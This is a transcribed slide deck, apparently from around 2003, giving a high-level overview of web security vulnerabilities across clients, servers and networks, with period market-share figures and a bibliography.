ladd van tol senior software engineer security on the web part one - vulnerabilities

17
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities

Upload: lizbeth-waters

Post on 27-Dec-2015

219 views

Category:

Documents


0 download

TRANSCRIPT

Ladd Van TolSenior Software Engineer

Security on the Web

Part One - Vulnerabilities

•Client•Browser•Operating System•Secondary Software

•Server•Web Server•Operating System•Secondary Software

•Network•Protocol•Transport

Vulnerabilities

•Web Browsers•Internet Explorer > 90% market share•Mozilla Derivatives < 5% market share

•Operating Systems•Windows > 90% market share•Macintosh < 5% market share•Linux < 1% market share

•Secondary Software•Email clients•Browser add-ons

Types of Clients

•HyperText Transfer Protocol (HTTP)•versions 1.0, 1.1•stateless TCP/IP protocol•cookies•basic authentication features•transfer encodings•keep-alive, pipelining

•Secure Socket Layers (SSL)•encrypts connections•identity verified by server certificate•certificate issued by certification

authority

Browser Protocol

•HTML rendering•HTML 1.0, 2.0, 3.2, 4.01, XHTML 1.0,

1.1•XML + XSL•CSS 1.0, 2.0

•Embedded Dynamic Features•JavaScript, Java, ActiveX•Media Players, other Plug-Ins

Browser Content

•Social engineering•Spoofing•Can exploit DNS, or look-alike URLs

•Embedding Weaknesses•Java, ActiveX security policy•Plug-in Security Policy

•Buffer overflows•Can affect browser, OS, or add-on

software•Could be “remote root exploit”

Client Vulnerabilities

•Scripting Weaknesses•JavaScript security policy

•Cross site scripting (XSS) Attacks•Targeted towards personal info site•Often exploits unfiltered user input

(comment areas, forums, etc)•Inject malicious scripts which can steal

cookies/other info

Client Vulnerabilities

•Privacy Policies•Cookies•Usage tracking•Browser control over advertising•Content Filtering

Privacy/Content

•Estimated 35 million servers on the web•Includes virtual hosts

•Apache•Microsoft IIS*•Sun ONE*

Types of Servers

© 2003, Netcraft

*Business sites more likely using commercial servers

•Linux, BSD variants•Windows flavor-of-the-week•Solaris, other high-end Unixes

Operating Systems

•Database Servers•MySQL, SQL Server, Oracle, DB2

•Web Applications•Implementation platforms•Scripting•PHP, Perl, Python, ASP, JSP, XSP

•Java Frameworks•J2EE, WebSphere, WebLogic,

WebObjects•Other Frameworks•.NET

Secondary Services

•Exploitable Web Applications•Source of many serious targeted exploits•Invalidated Parameters•Broken Access Control•Session Hijacking•Cross-Site Scripting Flaws•Command Injection Flaws•Error Handling Problems•Insecure Use of Cryptography•Remote Administration Flaws•Web and Application Server

Misconfiguration

Server Vulnerabilities

•Other attacks•Denial of Service•Remote Root Exploits•Network Topology, Protocols•Worms•Limited ability to enforce acceptable

use policies

Server Vulnerabilities

•IIS Vulnerability, worm deployed July, 2001•Distributed denial of service (DDOS) attack

Worm ExampleCode Red

•Internet uses TCP/IP, UDP•Connected Networks•Routers•Domain Name Servers (DNS)•Firewalls•Virtual Private Networks (VPN)

•Proxy Servers•Load Balancers

Networks

•Availability•Attacks on key routers•Attacks on DNS

•Confidentiality•Sniffing clear-text traffic

Network Vulnerabilities

• W3 Consortium - http://w3c.org

• w3schools browser stats - http://www.w3schools.com/browsers/browsers_stats.asp

• Thawte - http://thawte.com

• Cross-site scripting FAQ - http://www.cgisecurity.com/articles/xss-faq.shtml

• Netcraft Web Server Survey - http://netcraft.co.uk/survey/

• CERT - http://www.cert.org/

• CAIDA Analysis of Code Red - http://www.caida.org/analysis/security/code-red/

• OWASP Top 10 Vulnerabilities - http://www.serverwatch.com/news/article.php/1568761

• Personal experience, 3+ years at:

• MacFixIt.com

• MacCentral.com

• VersionTracker.com

Bibliography